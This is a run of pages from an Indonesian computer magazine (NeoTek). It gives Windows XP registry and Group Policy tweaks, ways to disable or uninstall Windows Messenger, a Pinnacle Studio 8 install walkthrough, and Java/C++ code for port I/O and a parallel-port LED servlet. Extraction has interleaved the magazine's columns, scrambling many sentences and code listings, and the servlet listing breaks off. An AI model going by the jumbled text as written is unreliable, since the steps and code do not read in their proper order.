dingkan versi-versi sebelumnya. Namun dapat saja suatu Menambahkan Opsi Email pada Desktop
saat komputer anda crash dan menampilkan blue screen of
Apanbila anda menggunakan Outlook Express sebagai pro-
death yang menjengkelkan itu. Anda dapat mengganti blue
gram email, akan bermanfaat apabila anda dapat menam-
screen of death yang artinya hang itu menjadi reboot oto-
bahkan Outlook Express Email Message pada opsi New
matis dengan cara, dapatkan:
sewaktu klik kanan pada desktop.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Caranya masuk ke:
Control\CrashControl
HKEY_CLASSES_ROOT\.eml
lalu dapatkan subkey AutoReboot dan pastikan value-nya 1.
dan klik kanan pada pane kanan dan tambahkan suatu key
Anda dapat mengubah waktu tunggu (application timeout
baru dengan nama ShellNew. Di bawah key ini buat lagi
value) sebelum Windows memutuskan bahwa suatu pro-
subkey (dengan klik kanan lagi pada pane kanan) string
gram mandeg atau crash pada:
value dengan nama Command.
HKEY_CURRENT_USER\Control Panel\Desktop
Klik kanan pada subkey Command dan tetapkan nilainya
dapatkan subkey HungAppTimeout, klik kanan dan pilih sebagai:
Modify yang akan menampilkan jendela Edit String. Ubah
“c:\program files\outlook express\msimn.exe” /mailurl:
Value data disini (default-nya 5000). Jangan tetapkan ter-
lalu rendah, sebab bisa-bisa sebentar-sebentar komputer (tanda petik diketikkan juga). Jangan lupa menambahkan
anda reboot secara otomatis. spasi setelah /mailurl:, kalau tidak yang anda tetapkan ini
tidak akan berfungsi.
Angka delay ini apabila ditetapkan dengan tepat akan sa-
ngat menghemat waktu anda dari kerepotan akibat kompu- Kini coba kembali ke desktop, klik kanan, pilih New dan
ter hang dan blue screen of death. tampak adanya entri baru di situ.

Pesan Email Baru Langsung pada Desktop

KEY BARU DIBAWAH .EML KLIK KANAN PADA DESKTOP


1 Buka Registry Editor dan masuk
ke HKEY_CLASSES_ROOT\.eml. Di
2 Pada desktop klik kanan dan pilih
New, akan tampak ada entri baru
bawah .eml buat key baru dengan di sini, yaitu Outlook Express Mail
nama ShellNew. Pada ShellNew Message, yang bila dipilih akan
buat string value dengan nama membuka jendela New Message
Command. Tetapkan value-nya dari Outlook Express.
sebagai:
“c:\program files\outlook
express\msimn.exe” /mailurl:

Vol. IV No. 05 NeoTek 9


NeoStart

UTAK-ATI K WI N DOWS X P
Bongkar Pasang Komponen
Pada Windows XP sudah terpasang software maupun setelan yang dianggap terbaik untuk
anda, walaupun mungkin bukan itu yang anda mau. Windows Messenger yang tiap kali start
selalu dimuat, misalnya, adalah salah satu ‘fasilitas’ yang menjengkelkan.

Windows Messenger tidak terdapat dalam daftar Windows


K
ECUALI ANDA MEMANG ANAK REMAJA YANG PUNYA
banyak waktu, besar kemungkinan bahwa anda Component yang dapat dibuang, sebab memang disembu-
tidak membutuhkan Windows Messenger, yang nyikan. Untuk menampilkannya anda harus melakukan
selalu dijalankan oleh Windows XP setiap kali dijalankan. perubahan pada file sysoc.inf yang terdapat pada direktori:
Cara termudah untuk menghentikannya adalah masuk ke C:\Windows\inf
Windows Messenger, klik Tools > Options..., pilih tab Sebelum melakukan perubahan terhadap file sysoc.inf ini,
Preferences, dan hilangkan tick didepan Run This Program salin dulu menjadi misalnya sysoc2.inf, agar alih-alih ada
When Windows Start maupun Allow This Program To yang salah, anda dapat kembali ke setting awal.
Run in The Background.
Kini buka file sysoc.inf dengan Wordpad. Setiap baris teks
Pada Windows XP Pro ada cara lain, yaitu dengan cara men- mewakilkan suatu komponen Windows yang dapat ditam-
jalankan Group Policy. Pilih Start > Run, lalu ketikkan pilkan pada jendela Add/Remove Windows Components.
gpedit.msc dan jendela Group Policy akan ditampilkan. Salah satunya adalah Windows Messenger.
Pilih Computer Configuration\Administrative Templates\ Hilangkan kata hide pada baris ini, save file ini, dan restart
Windows Components\Windows Messenger. Double click komputer anda. Kini anda dapat menemukan Windows
pada Do not allow Windows Messenger to be run yang Messenger sebagai salah satu komponen yang dapat dibu-
akan memunculkan jendela dialog khusus. Pada tab Setting ang pada jendela Add/Remove Windows Components.
pilih Enabled.
Dapat juga dengan mengutak-atik registry (berlaku untuk Mem-bypass Recycle Bin
Windows XP Home maupun Pro). Jalankan regedit dan
hapus key-key berikut: Anda mungkin sudah tahu bahwa anda dapat sama sekali
menghapus suatu file tanpa perlu melalui Recycle Bin, de-
HKEY_CURRENT_USER\Software\Microsoft\Windows\ ngan cara meng-highlight file itu pada Windows Explorer
CurrentVersion\Run\MSMSGS dan menekan Shift+Delete.
Apabila anda menggunakan Windows XP Pro anda dapat
Uninstall Windows Messenger menyetel agar file langsung dihapus tanpa melalui Recycle
Apabila anda ingin sama sekali meng-unistall Windows Bin, yaitu melalui penyetelan Group Policies.
Messenger, maka akan menemui kesulitan. Pasalnya,

Menampilkan Windows Messenger dari Persembunyiannya

FILE SYSOC.INF KINI BISA DI-REMOVE


1 Dapatkan file sysoc.inf pada
C:\Windows\inf lalu buka dan
2 Kini bila anda masuk ke Start >
Control Panel, double click Add or
save lagi sebagai backup-nya Remove Program dan kemudian
(misalnya sysoc2.inf). Cari baris pilih Add/Remove Windows Compo-
yang berisi msmsgs dan buang nents, maka akan terlihat bahwa
teks hide. Save kembali sebagai Windows Messenger kini sudah
sysoc.inf dan restart komputer menjadi salah satu komponen
anda. yang dapat di-remove.

10 NeoTek Vol. IV No. 05


NeoStart

kemudian double click pada Do not move deleted files to


the Recycle Bin yang akan menampilkan jendela Do not
move files to the Recycle Bin Propeties. Pada tab Setting
pilih Enable.
Di sini juga terdapat banyak setting lain yang dapat anda
atur sesuai selera anda.

Send ke Mana Saja


Kita semua tahu akan adanya opsi Send yang tampil apabila
kita meng-kklik kanan suatu file dalam Windows Explorer.
Pada Windows XP terdapat suatu folder tersembunyi SendTo
yang dapat anda temukan di C:\Documents and Settings\
User\SentTo, dan dengan menambahkan atau mengurangi
item yang ada dalam folder ini, anda dapat mengkonfigur-
asi menu SendTo sesuai keinginan.
Anda dapat menambahkan shortcut ke program (misalnya
untuk membuka Notepad), atau shortcut ke lokasi tertentu
(apabila anda perlu memindahkan banyak file ke suatu
folder). Yang anda tambahkan atau buang hanya berlaku
untuk User yang bersangkutan saja.
WIndows XP Pro mem-
Meningkatkan Kinerja Windows XP
punyai Group Policy yang
dapat disetel dengan Pilih My Computer, lalu klik kanan dan pilih Properties.
cara menjalankan file Pada tab Advanced pilih Performance Setting yang akan
gpedit.msc menampilkan jendela Performance Options. Disini pilih
opsi Adjust for Best Performance, yang akan menghilang-
kan hiasan-hiasan grafis yang bagus, tetapi sebenarnya
tidak terlalu perlu.
Pada jendela Performance Options yang sama, pilih tab
Advanced dan pada bagian Memory usage, klik System
cache. Opsi ini terutama akan sangat membantu apabila
anda sering menggunakan program grafis seperti halnya
video editing.
Pilih Start > Run... kemudian ketikkan perintah
Dari Start > Run... ketikkan gpedit.msc untuk menampil- rundll32.exe advapi32.dll,ProcessIdleTask yang artinya
kan jendela Group Policies. Masuk ke: memerintahkan Windows untuk memproses terutama task
yang sedang dikerjakan, sedangkan proses background
User Configuration\Administrative Templates\Windows dijalankan lebih lambat.
Components\Windows Explorer

Menambah Fungsi Windows Explorer

FOLDER MILIK USER SHORTCUT KE WINZIP MEN-ZIP FILE JADI MUDAH


1 Buka Documents and Setting, lalu
masuk ke user tertentu dan akan
2 Misalkan kita pilih shortcut ke
WinZip, maka dalam folder
3 Kini pada Windows Explorer,
apabila anda klik kanan pada
terlihat adanya folder dengan SendTo itu akan tampak adanya suatu file dan pilih Send To, maka
nama SendTo. Buka folder ini dan entri baru WINZIP32. salah satu pilihannya adalah
klik kanan dan pilih New lalu pilih memasukkannya ke dalam suatu
lagi Shortcut. zip file.

Vol. IV No. 05 NeoTek 11


NeoStart

UTAK-ATI K WI N DOWS X P
Stop Windows Messenger!
Windows Messenger yang merupakan kloning dari MSN Messenger 4.6 adalah fasilitas dari
Windows XP yang dapat berjalan secara otomatis ketika membuka Outlook Express atau beberapa site
dari Microsoft. Hal ini sangat memudahkan para penggunanya, terutama yang mempunyai koneksi ke
internet. Tapi bagaimana bagi pengguna yang offline? Ikuti tutorial praktis Bondan Muliawan
(milis@waroengbedjo.com) untuk menghentikan fasilitas otomatis ini.
INDOWS XP SERVICE PACK 1 TELAH MEMBERIKAN FA- Simpan dan jalankan dengan cara klik dua kali file terse-
W silitas untuk meng-uninstall Windows Messenger.
Sedangkan Windows XP Home Edition dan XP
but pada Windows Explorer. Windows Messenger tidak
akan muncul, tapi akibatnya waktu yang dibutuhkan un-
Profesional (tanpa SP1) belum memberikan fasilitas un- tuk membuka Outlook Express akan bertambah (sekitar
tuk menghapus Windows Messenger. 30 detik).
Cara termudah untuk menghentikan aksi dari Windows Untuk itu ubah file tanpamsg.reg menjadi:
Messenger adalah meng-upgrade XP anda ke Windows
Windows Registry Editor Version 5.00
XP SP1 dan uninstall program Windows Messenger. Tapi [HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D94-
jika Anda lebih suka untuk bermain dengan registry dan 0000F875C541}\InProcServer32]
gemar untuk meng-oprek komputer anda, ikuti beberapa @=""
tip berikut yang dapat digunakan untuk memodifikasi "ThreadingModel"=""
tingkah laku Windows Messenger. [HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D94-
0000F875C541}\LocalServer32]
TIP 1: Windows Messenger otomatis berjalan sendiri @=""
ketika membuka Hotmail atau web site tertentu. Hal ini
dapat dicegah dengan melakukan hacking pada registry. Klik dua kali untuk mematikan fasilitas otomatis Windows
Messenger. Selain itu buatlah file denganmsg.reg untuk
Buka registry anda Start > Run, ketik regedit dan klik OK menghidupkan kembali fasilitas tersebut, isinya:
HKEY_CLASSES_ROOT\CLSID\{F3A614DC-ABE0-
Windows Registry Editor Version 5.00
11d2-A441-00C04F795683}\LocalServer32 [HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D94-
Sebelum melangkah ke proses selanjutnya backup dulu 0000F875C541}\InProcServer32]
@="C:\\Program Files\\Messenger\\msgsc.dll"
registry anda jika nantinya ingin mengembalikan lagi. "ThreadingModel"="Apartment"
Hapus baris yang menunjukkan path ke file MSMSGS.EXE [HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D94-
0000F875C541}\LocalServer32]
pada nilai (Default). Klik dua kali pada nilai (Default) dan @="\"C:\\Program Files\\Messenger\\msmsgs.exe\""
hapuslah seluruh baris. Tutup Regedit, sekarang Windows
Messenger akan berhenti beraksi ketika Hotmail dibuka. TIP 2: Windows Messenger dapat di uninstall.
Untuk menghapusnya tekan Start > Run, ketik:
RUNDLL32 ADVPACK.DLL,LaunchINFSection
%windir%\INF\MSMSGS.INF,BLC.Remove

Klik OK atau tekan Enter. Windows Messenger akan ter-


hapus dari Windows anda.

Cara lain jika anda malas membuka regedit, buatlah file


dengan nama tanpamsg.reg dengan Notepad. Ketik:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3A614DC-
ABE0-11d2-A441-00C04F795683}\LocalServer32]
@=""

12 NeoTek Vol. IV No. 05


NeoStart

TIP 3: Untuk mencegah agar Windows Messenger tidak dan ubah nilai dari automatic menjadi manual atau disable.
berjalan otomatis ketika anda membuka account Hotmail. Lalu:
Jalankan Regedit dan cari: Per User Restriction\User Configuration\Adminstrative
HKEY_CLASSES_ROOT\Messenger.MsgrObject Templates\Windows Components\Windows Messenger
dan ubah nilai dari automatic menjadi manual atau disable.
Klik kanan pada Messenger.MsgrObject, pilih rename, dan Keluar dari GPE dan restart Windows.
ubah namanya dengan yang lain, contoh:
Setelah melakukan ini Outlook atau Outlook Express ke-
Messenger.MsgrObject-DIMATIKAN! tika dibuka akan menjadi lama, sehingga untuk memper-
Klik OK atau tekan Enter, kemudian keluar dari Registry cepat jalankan:
Editor. Selain mengubah anda bisa menghapus nilai ter- MS Outlook Express > Tools > Options, pilih General tab
sebut, tapi sebelumnya sebaiknya anda backup dulu. dan matikan Messenger Support.
TIP 4: Untuk mencegah agar Windows Messenger tidak MS Outlook > Tools > Options, pilih tab Other dan
berjalan otomatis di Windows XP Anda. matikan Messenger Support.
Catatan untuk Group Policy Editor (GPE):
Jika Anda membuka GPE pada Windows XP SP1, maka anda akan
menemukan fasilitas untuk mematikan Windows Messenger. Lihat
gambar di bawah. Ubah nilai keduanya pada Enable maka mustahil
Windows Messenger dapat berjalan di komputer anda lagi.

Jalankan Regedit, dan masuklah pada:


HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\
Messenger\Client
Buat baru (atau modifikasi jika sudah ada), nilai dari
PreventAutoRun dan PreventRun dengan cara klik kanan
pada area yang kosong. Pilih New > Key > DWORD, beri
nilai 1 pada keduanya. Hal ini baru berfungsi jika Anda
sudah me-restart komputer.
TIP 5: Cara lain untuk mencegah agar Windows Messenger
tidak berjalan otomatis ketika Windows XP booting.

TIP 6: Mencegah Windows Messenger otomatis login


menggunakan account dari Microsoft Passport.
Klik tombol Start > Run... dan ketikkan
control userpasswords2
tekan Enter atau klik OK dan pilih tab Advanced. Pilih
Manage Passwords dan hapus semua masukkan Passport
dan klik OK/Apply.
Jalankan Windows Messenger, sign in dan ketik passport
anda, alamat email, dan password, kemudian hilangkan
check pada Sign me in automatically, simpan dan keluar
dari Windows Messenger.
Klik pada Start > Run... ketik msconfig klik OK atau TIP 7: Mencegah secara permanen Windows Messenger
tekan Enter. Klik pada tab Startup, hilangkan tanda cek agar tidak berjalan ketika membuka Outlook atau
pada MSMSGS (Windows Messenger). Tutup msconfig Hotmail.
dan restart Windows. Caranya mudah, masuk ke Windows Explorer ubah nama
Ingat bahwa dengan cara ini Windows Messenger tetap pada folder C:\Program Files\Messenger menjadi
berjalan ketika Anda menjalankan Outlook, Outlook Messenger-OFF!
Express, atau membuka Hotmail. Cara ini akan menon-aktifkan Windows Messenger tapi
Selain itu dapat gunakan cara lain: tidak berpengaruh apapun ketika Outlook dijalankan.
Klik tombol Start> Run... lalu ketik gpedit.msc dan pilih: Demikianlah beberapa tip untuk mengendalikan perilaku
Windows Messenger. Semoga beberapa cara di atas dapat
Per Machine Restriction\Computer Configuration\ menghilangkan rasa jengkel anda terhadap tindak-tanduk
Administrative Templates\Windows Components\ Windows Messenger.
Windows Messenger

Vol. IV No. 05 NeoTek 13


NeoStyle

BA S I C V I D E O E D I T I N G
Instalasi Pinnacle Studio 8
Andi Ismayadi (Fuzk3_kendi@yahoo.com) menanggapi banyaknya pertanyaan mengenai
instalasi Pinnacle Studio 8 dan Hollywood FX.
ARENA BANYAKNYA MINAT TERHADAP PINNACLE STUDIO 8 Hal ini yang kiranya menjadi masalah dalam penginstalan
K dan Hollywood FX yang dikirimkan ke e-mail saya
dan banyaknya pertanyaan tentang cara mengin-
program bundle dari Pinnacle Studio 8.
Kita akan ulas cara menginstal Pinacle Studio 8 dan bundle-
stal Pinnacle studio 8 dan Hollywood FX. Saya akan kem- nya. Cara menginstall berikut adalah menginstall Pinnacle
bali membahas cara menginstal program video editing ini. Studio 8 secara Auto Installation Bundle, artinya anda
Pertanyaan yang sering muncul adalah Setelah saya install menginstal Pinnacle Studio 8 lalu Pinnacle secara otomatis
Pinnacle Studio 8 ini program Hollywood fx-nya kok akan menginstal program-program bundlenya.
nggak ada?

Hollywood FX dalam Pinnacle Studio 8: Auto Installation Bundle

LETAK FOLDER HOLLYWOOD FX PILIHAN BAHASA INSTALASI DIMULAI


1 Direktori Hollywood FX harus ber-
ada dalam direktori instalasi Pinn-
2 Double click icon Setup.exe lalu
akan muncul konfirmasi bahasa
3 Setelah itu akan muncul proses
instalasi program.
acle Studio 8. Pengalaman saya yang akan digunakan dalam
apabila folder Hollywood FX di proses penginstalan.
luar direktori Pinnacle Studio 8,
Hollywood FX tidak dapat diinstal.
Namun ada juga program Holly-
wood FX yang Stand Alone dan
diinstal diluar Pinnacle.

SERIAL NUMBER LICENSE AGREEMENT OPSI-OPSI INSTALASI


4 Disini anda diminta untuk mema-
sukan Serial Number Pinnacle
5 Lalu akan muncul jendela License
Agreement, disini dijelaskan per-
6 Compact (apabila ingin menginstal
dengan kebutuhan minimum).
Studio 8, setelah itu klik Next janjian-perjanjian antar vendor Custom (dapat memilih bagian
untuk melanjutkan. dengan pengguna, klik Yes untuk program yang akan diinstal).
melanjutkan. Lalu ada direktori tempat program
Setelah itu akan ada tampilan ini bersemayam, Default-nya ada
yang anda dapat memilih tipe di direktori C:\ Namun anda da-
instalasi diantaranya: pat menggantinya ke direktori
Typical (sangat disarankan anda yang ada tentukan sendiri. Klik
untuk memilih tipe ini). Next untuk melanjutkan.

14 NeoTek Vol. IV No. 05


NeoStyle

RINCIAN INSTALASI PROSES INSTALASI AUTOMATIC BUNDLE


7 Lalu akan muncul tampilan in-
formasi tentang instalasi dan
8 Setelah itu proses penginstalan
berlangsung.
9 Seperti yang dijelaskan diatas
bahwa ini adalah instalasi secara
bagian-bagian dari program yang automatic bundle instalation,
akan diinstal, Klik Next lagi untuk oleh karena itu Hollywood FX
melanjutkan ke proses instalasi. secara otomatis akan mengekse-
kusi dirinya untuk terintstal
dalam komputer anda.

INSTALASI HOLLYWOOD FX INSTALASI SELESAI RESTART KOMPUTER


10 Disini anda dapat lihat proses
instalasi dari Hollywood FX.
11 Nah, setelah lama menunggu,
instalasi Pinnacle Studio 8
12 Setelah itu ada pertanyaan untuk
me-restart komputer sekarang
akhirnya beres juga. Disini akan atau nanti, saya sarankan anda
ada pertanyaan apakah anda me-restrart terlebih dahulu kom-
ingin menaruh icon Shortcut di puter anda untuk menyesuaikan
dekstop? system yang baru di install.

Instalasi Hollywood FX dari CD NeoTek


Diatas adalah instalasi Pinnacle Studio
8 dan Hollywood FX dengan cara Auto
Bundle Installation.
Nah, bagaimana caranya kita ingin
menginstall Hollywood FX yang
terdapat dalam CD NeoTek edisi Vol.
IV No. 02.
Dalam hal ini penginstalan Hollywood
FX yang terdapat dalam CD NeoTek
itu adlaah proses instalasi secara Stand
Alone Installation
REGISTRASI SIAPKAN KABEL
13 Nah, ketika anda masuk untuk
pertama kali ke Pinnacle Studio 8
14 Selamat anda telah melakukan
instalasi ini dan kini anda masuk
disini akan ada konfirmasi update untuk pertama kalinya ke
register, pilih I Am Already Pinnacle Studio 8.
Registered. Siap untuk bekarya.

Vol. IV No. 05 NeoTek 15


NeoStyle

Hollywood FX: Stand Alone Installation

BUKA CD NEOTEK IV/02 PERSIAPAN INSTALASI WELCOME SCREEN


1 Masuk ke menu CD NeoTek yang
terdapat program Hollywood FX
2 Anda akan langsung melihat
proses persiapan instalasi pro-
3 Ketika persiapan selesai instalasi
akan memunculkan sambutan
4.5 Gold. Klik menunya. gram ini. dan pesan dari vendor. Untuk
melanjutkan instalasi klik Next.

INSTAL DI FOLDER APA? PROSES INSTALASI HOLLYWOOD FX


4 Lalu akan muncul tempat instalasi ke folder yang akan
dipakai untuk program ini bersemayam anda dapat
5 Proses instalasi berjalan secara otomatis; anda tinggal
menunggu.
menggantinya, setelah itu klik Next untuk melanjutkan ke
proses selanjutnya

SERIAL NUMBER INSTALASI SELESAI


6 Setelah proses selesai anda diminta memasukkan serial
numbernya. Kalau anda tidak memiliki anda klik Cancel
7 Konfirmasi bahwa selesainya semua proses instalasi
program ini. Nah, setelah ini anda dapat bekerja dengan
saja. tenang karena semua program telah terinstal dengan
semestinya.

16 NeoTek Vol. IV No. 05


NeoTutor

JAVA WO R KS H O P
Java dan Port I/O
Pada dasarnya Java tidak mempunyai kemampuan untuk membaca/menulis
dari/atau ke port I/O. Untuk itu, Fitrianto Halim (fitriantoh@hotmail.com) membahas cara
menggunakan C++ untuk memberikan fungsi itu pada Java.
PC SEMAKIN CEPAT, TETAPI /*
W
ALAUPUN PERKEMBANGAN
ada beberapa peninggalan dari generasi sebelumnya * Class: myIO
(PC XT dan PC AT) yang masih dipertahankan. * Method: outputb
Beberapa di antaranya adalah port-port paralel, serial, timer, * Signature: (II)V
PC speaker, dan lain-lain. */
Pada artikel ini, penulis membahas cara membaca dari dan/ JNIEXPORT void JNICALL Java_myIO_outputb
atau menulis ke port I/O (Input/Output) menggunakan Java (JNIEnv *, jobject, jint, jint);
yang dikombinasikan dengan C++ untuk bagian native-nya.
#ifdef __cplusplus
Sebagai contoh pemanfaatannya, akan disajikan cara mem- }
bangkitkan suara pada PC speaker. #endif
#endif
Kelas MyIO dan _io_.dll
Java pada dasarnya tidak mempunyai kemampuan untuk Sekarang, kita menginjak ke program yang ditulis dengan
membaca dari dan/atau menulis ke port I/O. Untuk itu, kita C++. Untuk lebih jelasnya, Anda dapat melihat listing file
harus membuat native-nya yang dibuat dengan C++. _io_.cpp berikut:
#include <conio.h>
Untuk lebih jelasnya, mari kita membuat kelas myIO (lihat #include "myIO.h"
listing file myIO.java) sebagai berikut:
class myIO { JNIEXPORT jint JNICALL Java_myIO_inputb
public native int inputb(int nport); (JNIEnv *env, jobject obj, jint nport) {
public native void outputb(int nport, int out); return _inp(nport);
static{ }
System.loadLibrary("_io_");
} JNIEXPORT void JNICALL Java_myIO_outputb
} (JNIEnv *env, jobject obj, jint nport, jint out) {
_outp(nport, out);
Compile myIO.java menggunakan perintah: }
javac myIO.java
Lalu, compile _io_.cpp dengan perintah berikut untuk
Karena kita akan membuat native-nya dengan C++ (dalam menghasilkan _io_.dll:
hal ini digunakan MS Visual C++ 6.0), maka ketikkan cl _io_.cpp /LD /Fe_io_.dll /Ic:\jdk1.3\include
perintah berikut untuk menghasilkan file header (file /Ic:\jdk1.3\include\win32
myIO.h): /Ic:\progra~1\micros~3\vc98\include
javah -jni myIO
Catatan:
Isi file myIO.h yang dihasilkan adalah sebagai berikut: • Ganti c:\progra~1\micros~3\vc98\include sesuai dengan
penempatan folder include dari Visual C++ yang anda
/* DO NOT EDIT THIS FILE - it is machine generated */ gunakan. Sebetulnya, kita bisa memasukkan long file
#include <jni.h> name, tetapi berhubung keterbatasan jumlah karakter
/* Header for class myIO */ pada command-line, maka hal itu tidak kami lakukan.
#ifndef _Included_myIO • Jika compiler tidak dapat menemukan file-file library,
#define _Included_myIO maka copy-kan file-file: Libcmt.lib, Oldnames.lib, dan
#ifdef __cplusplus Kernel32.lib ke current directory (directory tempat Anda
extern "C" { melakukan compile).
#endif Ingat, nantinya hanya file-file myIO.class dan _io_.dll yang
/* dipergunakan dalam aplikasi.
* Class: myIO
* Method: inputb Pembangkitan Suara pada PC Speaker
* Signature: (I)I Untuk membangkitkan suara pada PC speaker sebenarnya
*/ cukup mudah, yaitu dengan cara menghidupkan dan mema-
JNIEXPORT jint JNICALL Java_myIO_inputb tikan PC speaker secara bergantian dengan durasi yang sama.
(JNIEnv *, jobject, jint);
Umumnya, teknik yang digunakan adalah seperti yang di-
perlihatkan pada Gambar 1.

Vol. IV No. 05 NeoTek 17


NeoTutor

Gambar 1
(JAVA DAN PORT I/O), KITA
P
ADA ARTIKEL SEBELUMNYA
Langkah-langkahnya adalah: telah belajar cara membaca dari dan/atau menulis
ke port I/O (Input/Output) menggunakan Java
• Isi port 43h dengan: 10110110b atau sama dengan B6h.
disertai contoh pemanfaatannya, yaitu membangkitkan
• Isi port 42h dengan frekuensi pembagi, LSB dulu baru MSB.
suara pada PC speaker.
• Aktifkan bit-0 dan bit-1 dari port 61h.
Pada artikel kali ini, kita akan membahas pemanfaatan
Untuk menghentikannya cukup mudah, yaitu dengan menon- kelas myIO dan _io_.dll untuk tujuan yang lebih menarik
aktifkan bit-0 dan bit-1 dari port 61h. Misalkan, kita ingin lagi, yaitu pengendalian jarak jauh berbasis internet.
membangkitkan suara dengan frekuensi 1000Hz, maka cara
Perangkat yang akan kita kendalikan juga sederhana, karena
menghitung frekuensi pembagi adalah:
kita memanfaatkan port yang tersedia, yaitu Parallel Port.
1193180
Frekuensi Pembagi = ______________ = 1193 = 0429h Parallel Port
1000
Parallel Port (atau disebut juga Printer Port) umumnya
dimanfaatkan untuk melayani pencetak paralel. Port pa-
Berikut ini adalah program untuk menghidupkan suara ralel pada PC sekarang umumnya 1 buah (LPT1). Tabel 1
dengan frekuensi 1000Hz selama 5 detik (lihat file testIO.java): berisi alamat, sifat, dan nama port untuk LPT1:
class testIO {
public static void main(String[] args) { Tabel 1.
try { Alamat Sifat Nama
int in;
378h R/W Data port (DP)
myIO io = new myIO(); 37Ah R/W Printer control (PC)
io.outputb(0x43, 0xb6); 379h R Printer status (PS)
io.outputb(0x42, 0xa9);
io.outputb(0x42, 0x04);
in = io.inputb(0x61);
in = in | 0x03; Tabel 2 berisi no pin, nama dan sinyal pada soket D25-betina:
io.outputb(0x61, in);
Thread.sleep(5000); Tabel 2.
in = io.inputb(0x61);
in = in & 0xfc;
io.outputb(0x61, in); Pin # Nama Sinyal
} catch(InterruptedException e) { 2 DP-0 data bit-0
} 3 DP-1 data bit-1
} 4 DP-2 data bit-2
} 5 DP-3 data bit-3
6 DP-4 data bit-4
Untuk meng-compile-nya, gunakan perintah: 7 DP-5 data bit-5
javac testIO.java 8 DP-6 data bit-6
9 DP-7 data bit-7
Untuk menjalankannya, gunakan perintah:
java testIO 1 PC-0 strobe
14 PC-1 autofeed
16 PC-2 init
Penutup 17 PC-3 select
Anda dapat mengembangkan program di atas agar lebih
berguna, misalkan untuk membaca file yang berisi 15 PS-3 error
pasangan notasi dan durasinya. 13 PS-4 select
12 PS-5 paper end
Selamat mencoba 10 PS-6 acknowledge
dengan 11 PS-7 busy

Tip: Masukkan folder bin dari JDK dan Visual C++ ke 18 ... 25 ground
dalam PATH untuk memudahkan kompilasi.

18 NeoTek Vol. IV No. 05


NeoTutor

JAVA WO R KS H O P
Remote Control dengan Servlet
Melanjutkan bahasan Java dan port I/O, Fitrianto Halim (fitriantoh@hotmail.com)
menunjukkan pembuatan suatu aplikasi untuk memanfaatkannya,
yaitu remote control berbasis Internet dengan memanfaatkan parallel port.

Aplikasi <option value=->Abaikan</option>


<option value=1>Nyala</option>
Aplikasi yang kami buat sederhana saja, yaitu hanya untuk <option value=0>Padam</option>
yang berjalan di sisi server menggunakan servlet dan bebe- </select>
rapa file HTML sebagai antar-muka untuk client. Sedang- </td>
kan untuk client-nya, Anda dapat memanfaatkan browser. </tr>
<tr>
Diharapkan anda sudah mengenal Tomcat yang berfungsi <td>LED #3: </td>
sebagai servlet container. Jika belum, Anda dapat memba- <td>
canya di NeoTek Vol. III No. 3. <select name=LED3>
Dibawah folder webapps, buatlah folder remote beserta <option value=->Abaikan</option>
sub-sub folder-nya sebagai terlihat pada Gambar 1: <option value=1>Nyala</option>
<option value=0>Padam</option>
Ada dua buah file HTML yang diguna- </select>
kan sebagai antar-muka untuk client, </td>
yaitu index.html dan pilih.html; yang </tr>
keduanya diletakkan pada folder remote. <tr>
Gambar 1
Isi file index.html adalah sebagai berikut: <td>LED #4: </td>
<td>
<html> <select name=LED4>
<head><title>Menu Utama</title></head> <option value=->Abaikan</option>
<body> <option value=1>Nyala</option>
<p align=center> <option value=0>Padam</option>
<strong>Menu Utama</strong> </select>
<br><hr> </td>
</p> </tr>
<p align=left> <tr>
&#149; <a href="./myRemote?Status=baca">Baca Status <td>LED #5: </td>
LED</a><br/> <td>
&#149; <a href="pilih.html">Ganti Status LED</a><br/> <select name=LED5>
</p> <option value=->Abaikan</option>
</body> <option value=1>Nyala</option>
</html> <option value=0>Padam</option>
</select>
Isi file pilih.html adalah sebagai berikut: </td>
<html> </tr>
<head><title>Ganti Status LED</title></head> <tr>
<body> <td>LED #6: </td>
<p align=center> <td>
<strong>Ganti Status LED</strong> <select name=LED6>
<br><hr> <option value=->Abaikan</option>
</p> <option value=1>Nyala</option>
<p align=left> <option value=0>Padam</option>
<form method=post action=./myRemote> </select>
<input type=hidden name=Status value=tulis> </td>
<table> </tr>
<tr> <tr>
<td>LED #1: </td> <td>LED #7: </td>
<td> <td>
<select name=LED1> <select name=LED7>
<option value=->Abaikan</option> <option value=->Abaikan</option>
<option value=1>Nyala</option> <option value=1>Nyala</option>
<option value=0>Padam</option> <option value=0>Padam</option>
</select> </select>
</td> </td>
</tr> </tr>
<tr> <tr>
<td>LED #2: </td> <td>LED #8: </td>
<td> <td>
<select name=LED2> <select name=LED8>

Vol. IV No. 05 NeoTek 19


NeoTutor

<option value=->Abaikan</option> if(LED1==null) LED1 = "-";


<option value=1>Nyala</option> if(LED2==null) LED2 = "-";
<option value=0>Padam</option> if(LED3==null) LED3 = "-";
</select> if(LED4==null) LED4 = "-";
</td> if(LED5==null) LED5 = "-";
</tr> if(LED6==null) LED6 = "-";
<tr> if(LED7==null) LED7 = "-";
<td colspan=2 align=center> if(LED8==null) LED8 = "-";
<input type=submit value=Ganti> String s = LED1+" "+LED2+" "+LED3+" "+LED4+" "+
&nbsp; &nbsp; &nbsp; LED5+" "+LED6+" "+LED7+" "+LED8;
<input type=reset value=Reset> String myMsg = myTask("w", s);
</td> myWriter(out, myMsg);
</tr> } else
</table> myWriter(out, "Maaf, request-nya salah...");
</form> }
</p>
<hr><br> String myTask(String Status, String s) {
&#149; <a href=index.html>Index</a> int[] aSquare = {1, 2, 4, 8, 16, 32, 64, 128};
</body> String sMsg = "";
</html> myIO io = new myIO();
int in , i;
Sekarang kita menginjak ke servlet-nya. Ketikkan file if(Status.equals("w")){
myParalel.java pada folder classes dengan isi sbb: sMsg += ("Tulis: "+s+"<br><br>");
int nAND = 255;
import javax.servlet.*; int nOR = 0;
import javax.servlet.http.*; StringTokenizer st = new StringTokenizer(s, " ");
import java.io.*; int out;
import java.net.*; String sST;
import java.util.*; i = 0;
while(st.hasMoreTokens()) {
public class myParalel extends HttpServlet { sST = st.nextToken();
public void init() throws ServletException { if(sST.equals("0"))
// inisialisasi -> padamkan semua LED nAND -= aSquare[i];
